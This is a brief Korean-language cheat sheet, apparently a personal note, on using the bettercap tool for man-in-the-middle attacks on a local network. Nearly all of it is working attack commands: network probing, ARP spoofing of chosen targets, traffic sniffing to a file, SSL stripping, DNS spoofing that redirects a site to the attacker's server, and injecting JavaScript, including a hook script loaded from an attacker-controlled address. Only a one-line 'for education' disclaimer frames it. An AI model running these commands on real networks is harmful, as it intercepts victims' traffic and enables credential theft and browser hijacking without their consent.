bettercap command
bettercap 사용법 정리
bettercap command
- MITM 공격에 사용되는 도구로 교육용으로 참고해야 한다.
1. 설치
sudo apt update
sudo apt install bettercap2. 사용법
sudo bettercapinterface 를 지정할 때는 아래는 명령어를 이용하자.
sudo bettercap -iface eth0wifi 에 연결된 장치들을 검색하자.
net.probe onwifi 에 연결된 장치들을 나열하자.
net.show스푸핑할 ip 를 설정하자.
set arp.spoof.targets <ip>
set net.sniff.output filename # output file 지정arp.spoof onhttps -> https 로 바꿔주려면 아래 명령어를 이용하자.
적용이 되는 사이트가 있고 안되는 사이트가 있다.
set http.proxy.sslstrip truedns 스푸핑 할때는 아래와 같이 설정하자.
set dns.spoof.domains test.com # dns spoof
dns.spoof ontarget 이 들어간적 없는 사이트 test.com 에 대해 웹브라우저에서 들어가면 bettercap 을 실행중인 pc의 웹서버로 리다이렉션 된다.
javascript injection 을 할때는 아래 명령어를 이용하자.
set http.proxy.injectjs ./java-script.js # inject javascript또는
set http.proxy.injectjs https://<ip>:3000/hook.js # inject javascripthttp.proxy on아래는 패킷 캡쳐를 시작하는 명령어 이다.
net.sniff on